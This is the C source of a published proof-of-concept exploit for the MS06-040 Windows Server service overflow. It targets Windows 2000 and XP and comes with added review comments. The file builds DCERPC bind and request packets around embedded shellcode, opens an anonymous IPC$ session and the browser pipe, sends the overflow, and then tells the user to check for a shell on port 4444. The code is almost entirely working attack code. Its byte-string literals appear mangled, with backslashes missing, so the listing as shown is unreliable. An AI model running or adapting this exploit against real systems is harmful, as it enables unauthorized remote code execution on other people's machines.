
# Title : MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)
# Published : 2006-08-28
# Author : ub3rst4r


/*
 * MS06-040 Remote Code Execution Proof of Concept
 *
 * Ported by ub3r st4r aka iRP
 * ---------------------------------------------------------------------
 * Tested Against:
 *  Windows XP SP1
 *  Windows 2000 SP4
 *
 * Systems Affected:
 *  Microsoft Windows 2000 SP0-SP4
 *  Microsoft Windows XP SP0-SP1
 *  Microsoft Windows NT 4.0
 * ---------------------------------------------------------------------
 * This is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission
 * to do so.
 *
 * PRIVATE v.0.2 (08-27-06)
 */

#include <stdio.h>
#include <windows.h>

#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")

// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
// DCERPC bind packet; main() sends it first over the named pipe and the
// interface named above is what it binds to.  The bind is the first
// RPC-level event a pipe/SMB log would show for this sequence.
// NOTE(review): every byte-string literal in this listing appears to have
// been mangled by the site's extraction ("x05" in place of a single byte);
// the arrays are reproduced here exactly as found.
unsigned char DCERPC_Bind_RPC_Service[] =
       "x05x00x0Bx03x10x00x00x00x48x00x00x00x00x00x00x00"
       "xD0x16xD0x16x00x00x00x00x01x00x00x00x00x00x01x00"
       "xC8x4Fx32x4Bx70x16xD3x01x12x78x5Ax47xBFx6ExE1x88"
       "x03x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00"
       "x2Bx10x48x60x02x00x00x00";

// request windows api: NetprPathCanonicalize (0x1f)
// DCERPC request header.  Both target branches in main() copy it to the
// start of szReqBuf (without its terminating NUL) and then patch count
// fields and the path buffer at hard-coded offsets after it.
unsigned char DCERPC_Request_RPC_Service[] =
       "x05x00x00x03x10x00x00x00x30x08x00x00x00x00x00x00"
       "x18x08x00x00x00x00x1fx00xffxffxffxffx01x00x00x00"
       "x00x00x00x00x01x00x00x00x00x00x00x00";

       // path ...

// Request trailer; both branches in main() append it after the path
// buffer (again without its terminating NUL).
unsigned char DCERPC_Request_RPC_Service_[] =
       "xfax00x00x00x02x00x00x00x00x00x00x00x02x00x00x00"
       "x00x00x00x00xfax00x00x00x00x00x00x00";

// Payload bytes, opaque as listed.  The closing message in main() says a
// shell is expected on port 4444 afterwards, which presumably makes this
// a listening-shell payload -- not verifiable from the bytes here.
unsigned char sc[] =
       "x6ax51x59xd9xeexd9x74x24xf4x5bx81x73x13xa8x97x90"
       "x88x83xebxfcxe2xf4x29x53x6fx67x57x68xd4x74xc2x7c"
       "xddx60x51x68x6fx77xc8x1cxfcxacx8cx1cxd5xb4x23xeb"
       "x95xf0xa9x78x1bxc7xb0x1cxcfxa8xa9x7cxd9x03x9cx1c"
       "x91x66x99x57x09x24x2cx57xe4x8fx69x5dx9dx89x6ax7c"
       "x64xb3xfcxb3xb8xfdx4dx1cxcfxacxa9x7cxf6x03xa4xdc"
       "x1bxd7xb4x96x7bx8bx84x1cx19xe4x8cx8bxf1x4bx99x4c"
       "xf4x03xebxa7x1bxc8xa4x1cxe0x94x05x1cxd0x80xf6xff"
       "x1exc6xa6x7bxc0x77x7exf1xc3xeexc0xa4xa2xe0xdfxe4"
       "xa2xd7xfcx68x40xe0x63x7ax6cxb3xf8x68x46xd7x21x72"
       "xf6x09x45x9fx92xddxc2x95x6fx58xc0x4ex99x7dx05xc0"
       "x6fx5exfbxc4xc3xdbxfbxd4xc3xcbxfbx68x40xeexc0x86"
       "xccxeexfbx1ex71x1dxc0x33x8axf8x6fxc0x6fx5exc2x87"
       "xc1xddx57x47xf8x2cx05xb9x79xdfx57x41xc3xddx57x47"
       "xf8x6dxe1x11xd9xdfx57x41xc0xdcxfcxc2x6fx58x3bxff"
       "x77xf1x6exeexc7x77x7exc2x6fx58xcexfdxf4xeexc0xf4"
       "xfdx01x4dxfdxc0xd1x81x5bx19x6fxc2xd3x19x6ax99x57"
       "x63x22x56xd5xbdx76xeaxbbx03x05xd2xafx3bx23x03xff"
       "xe2x76x1bx81x6fxfdxecx68x46xd3xffxc5xc1xd9xf9xfd"
       "x91xd9xf9xc2xc1x77x78xffx3dx51xadx59xc3x77x7exfd"
       "x6fx77x9fx68x40x03xffx6bx13x4cxccx68x46xdax57x47"
       "xf8x67x66x77xf0xdbx57x41x6fx58";

/*
 * Entry point.  Flow as visible in this file: build a DCERPC request
 * buffer for the selected target, add an IPC$ connection to argv[1]
 * with an empty user name and password, open the browser named pipe on
 * it, send the bind packet, write the request and exit without reading
 * a reply.
 *
 * argv[1] is the host; argv[2] selects the request layout (1 or 2, see
 * the usage text).  Returns -1 on usage, connection, pipe-open, bind or
 * write failure, 0 otherwise.
 *
 * From the defending side the observable sequence is: an anonymous IPC$
 * session, an open of the browser pipe, a DCERPC bind to the interface
 * named on the bind packet, and a single request -- the points at which
 * host and network logging would record this activity.
 *
 * NOTE(review): the string and char literals in this listing appear to
 * have been mangled by the site's extraction; they are reproduced as found.
 */
int main(int argc, char* argv[])
{
       HANDLE hFile;
       NETRESOURCE nr;

       char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];

       unsigned int i; // loop index for the 4-byte fill in the target-1 branch

       unsigned char szInBuf[4096];          // receives the bind reply; never inspected
       unsigned long dwRead, nWritten;

       unsigned char szReqBuf[2096];         // the whole 2096 bytes are sent, however much a branch fills

       // Both host and target are required, although the usage text shows [target] as optional.
       if (argc < 3){
               printf("[-] Usage: ms06040poc <host> [target]n");
               printf("t1 - Windows 2000 SP0-SP4n");
               printf("t2 - Windows XP SP0-SP1n");
               return -1;
       }

       memset(szReqBuf, 0, sizeof(szReqBuf));

       // Target 1 (Windows 2000 per the usage text).  A target value other
       // than 1 or 2 matches neither branch and an all-zero request is sent.
       if (atoi(argv[2]) == 1) {
               unsigned char szBuff[1064];

               // build payload buffer
               memset(szBuff, 'x90', 1000);
               memcpy(szBuff+630, sc, sizeof(sc));

               for(i=1000; i<1064; i+=4) {
                       memcpy(szBuff+i, "x04x08x02x00", 4);
               }

               // build request buffer
               // Offsets below are tied to the fixed layout of the request header copied first.
               memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);
               memcpy(szReqBuf+44, "x15x02x00x00", 4); /* max count */
               memcpy(szReqBuf+48, "x00x00x00x00", 4); /* offset */
               memcpy(szReqBuf+52, "x15x02x00x00", 4); /* actual count */
               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
               memcpy(szReqBuf+1120, "x00x00x00x00", 4); /* align string */
               memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);
               memcpy(szReqBuf+1140 , "xebx02", 2);
       }
       // Target 2 (Windows XP per the usage text); argv[2] is re-parsed here.
       if (atoi(argv[2]) == 2) {
               unsigned char szBuff[708];

               memset(szBuff, 'x90', 612); /* size of shellcode */
               memcpy(szBuff, sc, sizeof(sc));

               memcpy(szBuff+612, "x0ax08x02x00", 4);
               memset(szBuff+616, 'A', 8); // 8 bytes padding
               memcpy(szBuff+624, "x04x08x02x00", 4);
               memset(szBuff+628, 'x90', 32);
               memcpy(szBuff+660, "x04x08x02x00", 4);
               memset(szBuff+664, 'B', 8); // 8 bytes padding
               memcpy(szBuff+672, "x04x08x02x00", 4);
               memset(szBuff+676, 'x90', 32);

               // build request buffer
               memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);
               memcpy(szReqBuf+44, "x63x01x00x00", 4); /* max count */
               memcpy(szReqBuf+48, "x00x00x00x00", 4); /* offset */
               memcpy(szReqBuf+52, "x63x01x00x00", 4); /* actual count */
               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
               memcpy(szReqBuf+764, "x00x00x00x00", 4); /* align string */
               memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);
       }

       printf("[+] Connecting to %s ... n", argv[1]);

       // Only four NETRESOURCE fields are set; the rest of nr is left
       // uninitialized automatic storage.
       _snprintf(szRemoteName, sizeof(szRemoteName), "\\%s\ipc$", argv[1]);
       nr.dwType = RESOURCETYPE_ANY;
       nr.lpLocalName = NULL;
       nr.lpProvider = NULL;
       nr.lpRemoteName = szRemoteName;
       // Empty user name and password: an anonymous session to the share.
       if (WNetAddConnection2(&nr, "", "", 0) != NO_ERROR) {
               printf("[-] Failed to connect to host !n");
               return -1;
       }

       _snprintf(szPipePath, sizeof(szPipePath), "\\%s\pipe\browser", argv[1]);
       hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);

       // The connection added above is never cancelled on any path in this file.
       if (hFile == INVALID_HANDLE_VALUE) {
               printf("[-] Failed to open named pipe !n");
               return -1;
       }

       printf("[+] Binding to RPC interface ... n");
       // Writes the bind packet and reads one reply into szInBuf; the reply
       // contents are not examined, only the call's success.
       if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service, sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL) == 0) {
               printf("[-] Failed to bind to interface !n");
               CloseHandle(hFile);
               return -1;
       }

       printf("[+] Sending RPC request ... n");
       // Sends the full fixed-size buffer; nWritten is not checked against it.
       if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {
               printf("[-] Unable to transmit RPC request !n");
               CloseHandle(hFile);
               return -1;
       }

       // No response is read.  hFile is not closed on this path; process
       // exit reclaims it.
       printf("[+] Now check for shell on %s:4444 !n", argv[1]);

       return 0;
}
